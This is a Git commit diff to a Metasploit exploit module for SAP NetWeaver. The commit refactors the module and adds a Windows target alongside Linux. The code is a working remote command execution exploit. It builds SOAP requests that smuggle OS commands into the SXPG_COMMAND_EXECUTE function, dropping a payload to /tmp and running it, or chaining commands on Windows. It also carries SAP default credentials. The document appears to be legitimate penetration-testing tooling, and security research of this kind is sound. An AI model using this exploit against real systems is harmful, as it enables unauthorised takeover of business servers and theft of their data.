Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec

jvazquez-r7 · jvazquez-r7 · commit e939de583c95 · 2013-05-07T22:46:39.000-05:00
diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb
@@ -24,139 +24,181 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+class Metasploit4 < Msf::Exploit::Remote
+
+	Rank = GreatRanking
+
+	include Msf::Exploit::CmdStagerVBS
+	include Msf::Exploit::EXE
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize
 		super(
-			'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection',
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution',
 			'Description' => %q{
-					This module makes use of the SXPG_COMMAND_EXEC Remote Function Call, through the
-					use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.
-					SAP Note: 1341333 and 1764994.
-					},
+					This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP
+				SOAP RFC Service, to execute remote commands. This module needs SAP credentials with
+				privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
+				successfully on Windows 2008 64 bits and Linux 64 bits platforms.
+			},
 			'References' =>
 				[
 					[ 'URL', 'http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection' ],
 					[ 'URL', 'https://service.sap.com/sap/support/notes/1764994' ],
 					[ 'URL', 'https://service.sap.com/sap/support/notes/1341333' ]
 				],
 			'DisclosureDate' => 'May 8 2012',
-			'Arch'            => ARCH_CMD,
-			'Compat'          =>
-				{
-					'PayloadType' => 'cmd'
-				},
-			'Platform'       => ['unix', 'linux'],
-			'Targets'        =>
-				[
-					['SAP AS on Linux', {}]
+			'Platform'       => ['win', 'unix'],
+			'Targets' => [
+				[ 'Linux',
+					{
+						'Arch'     => ARCH_CMD,
+						'Platform' => 'unix'
+						#'Payload'  =>
+							#{
+								#'DisableNops' => true,
+								#'Space'       => 232,
+								#'Compat'      =>
+									#{
+										#'PayloadType' => 'cmd',
+										#'RequiredCmd' => 'perl ruby',
+									#}
+							#}
+					}
 				],
-			'DefaultTarget'  => 0,
-			'Privileged'     => true,
+				[ 'Windows x64',
+					{
+						'Arch' => ARCH_X86_64,
+						'Platform' => 'win'
+					}
+				]
+			],
+			'DefaultTarget' => 0,
+			'Privileged' => false,
 			'Author' =>
 				[
 					'nmonkee'
 				],
 			'License' => MSF_LICENSE
-			)
+		)
 		register_options(
 			[
 				Opt::RPORT(8000),
 				OptString.new('CLIENT', [true, 'SAP Client', '001']),
 				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
-				OptString.new('PASSWORD', [true, 'Password', '06071992']),
-				OptEnum.new('OS', [true, 'Target OS', "linux", ['linux']]),
+				OptString.new('PASSWORD', [true, 'Password', '06071992'])
 			], self.class)
+		register_advanced_options(
+			[
+				OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
+			], self.class)
+	end
+
+	def send_soap_request(data)
+		res = send_request_cgi({
+			'uri' => '/sap/bc/soap/rfc',
+			'method' => 'POST',
+			'data' => data,
+			'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+			'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+			'ctype' => 'text/xml; charset=UTF-8',
+			'headers' => {
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+			},
+			'vars_get' => {
+				'sap-client' => datastore['CLIENT'],
+				'sap-language' => 'EN'
+			}
+		})
+		return res
+	end
+
+	def build_soap_request(command, sap_command, sap_os)
+		data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\r\n"
+		data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n"
+		data << "<env:Body>\r\n"
+		data << "<n1:SXPG_COMMAND_EXECUTE xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n"
+		data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>\r\n"
+		data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>\r\n"
+		data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>\r\n"
+		data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>\r\n"
+		data << "</n1:SXPG_COMMAND_EXECUTE>\r\n"
+		data << "</env:Body>\r\n"
+		data << "</env:Envelope>"
+
+		return data
+	end
+
+	def check
+		data = rand_text_alphanumeric(4 + rand(4))
+		res = send_soap_request(data)
+		if res and res.code == 500 and res.body =~ /faultstring/
+			return Exploit::CheckCode::Detected
+		end
+		return Exploit::CheckCode::Safe
 	end
 
 	def exploit
-		file = Rex::Text.rand_text_alphanumeric(5)
-		ip = rhost
-		payload_ = create_payload(1,file)
-		exec_command(ip,payload_)
-		payload_ = create_payload(2,file)
-		exec_command(ip,payload_)
+		if target.name =~ /Windows/
+			linemax = datastore['PAYLOAD_SPLIT']
+			vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
+			print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
+			execute_cmdstager({ :delay => 0.35, :linemax => linemax })
+		elsif target.name =~ /Linux/
+			file = rand_text_alphanumeric(5)
+			stage_one = create_unix_payload(1,file)
+			print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
+			res = send_soap_request(stage_one)
+			if res and res.code == 200 and res.body =~ /External program terminated/
+				print_good("#{rhost}:#{rport} - Payload dump was successful")
+			else
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
+			end
+			stage_two = create_unix_payload(2,file)
+			print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
+			send_soap_request(stage_two)
+		end
 	end
 
-	def create_payload(num, file)
+	def create_unix_payload(stage, file)
 		command = ""
-		if datastore['OS'].downcase == "linux"
-			if num == 1
+		if target.name =~ /Linux/
+			if stage == 1
+				my_payload = payload.encoded.gsub(" ","\t")
+				my_payload.gsub!("&","&amp;")
+				my_payload.gsub!("<","&lt;")
 				command = "-o /tmp/" + file + " -n pwnie" + "\n!"
-				tmp_ = payload.encoded.gsub(" ","\t")
-				tmp__ = tmp_.gsub("&","&amp;")
-				command << tmp__.gsub("<","&lt;")
+				command << my_payload
 				command << "\n"
+			elsif stage == 2
+				command = "-ic /tmp/" + file
 			end
-			command = "-ic /tmp/" + file if num == 2
+
 		end
-		data = '<?xml version="1.0" encoding="utf-8" ?>' + "\r\n"
-		data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' + "\r\n"
-		data << '<env:Body>' + "\r\n"
-		data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' + "\r\n"
-		data << '<ADDITIONAL_PARAMETERS>' + command + ' </ADDITIONAL_PARAMETERS>' + "\r\n"
-		data << '<COMMANDNAME>DBMCLI</COMMANDNAME>' + "\r\n"
-		data << '<OPERATINGSYSTEM>ANYOS</OPERATINGSYSTEM>' + "\r\n"
-		data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>' + "\r\n"
-		data << '</n1:SXPG_COMMAND_EXECUTE>' + "\r\n"
-		data << '</env:Body>' + "\r\n"
-		data << '</env:Envelope>' + "\r\n"
-		return data
+
+		return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
 	end
 
-	def exec_command(ip,data)
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
-		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+	def execute_command(cmd, opts)
+		command = cmd.gsub(/&/, "&amp;")
+		command.gsub!(/%TEMP%\\/, "")
+		data = build_soap_request("&amp;#{command}", "LIST_DB2DUMP", "Windows NT")
 		begin
-			res = send_request_raw(
-				{
-					'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-					'method' => 'POST',
-					'data' => data,
-					'headers' => {
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-						'Authorization' => 'Basic ' + user_pass,
-						'Content-Type' => 'text/xml; charset=UTF-8'
-						}
-				}, 45)
-			if res
-				if res.code != 500 and res.code != 200
-					print_error("[SAP] #{ip}:#{rport} - something went wrong!")
-					return
-				elsif res.body =~ /faultstring/
-					error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+			res = send_soap_request(data)
+			if res and res.code == 200
+				return
+			else
+				if res and res.body =~ /faultstring/
+					error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
 					0.upto(error.length-1) do |i|
-						print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
-					end
-					return
-				end
-				output = res.body.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
-				result = []
-				0.upto(output.length-1) do |i|
-					if output[i] =~ /E[rR][rR]/ || output[i] =~ /---/ || output[i] =~ /for database \(/
-					#nothing
-					elsif output[i] =~ /unknown host/ || output[i] =~ /; \(see/ || output[i] =~ /returned with/
-					#nothing
-					elsif output[i] =~ /External program terminated with exit code/
-					#nothing
-					else
-						temp = output[i].to_s.gsub("&#62",">")
-						temp_ = temp.gsub("&#34","\"")
-						temp__ = temp_.gsub("&#39","'")
-						result << temp__ + "\n"
+						vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
 					end
 				end
-				return
-			else
-				print_error("[SAP] #{ip}:#{rport} - no response")
+				print_status("#{res.code}\n#{res.body}")
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
 			end
 		rescue ::Rex::ConnectionError
-			print_error("[SAP] #{ip}:#{rport} - Unable to connect")
-			return
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
 		end
 	end
-end
+end
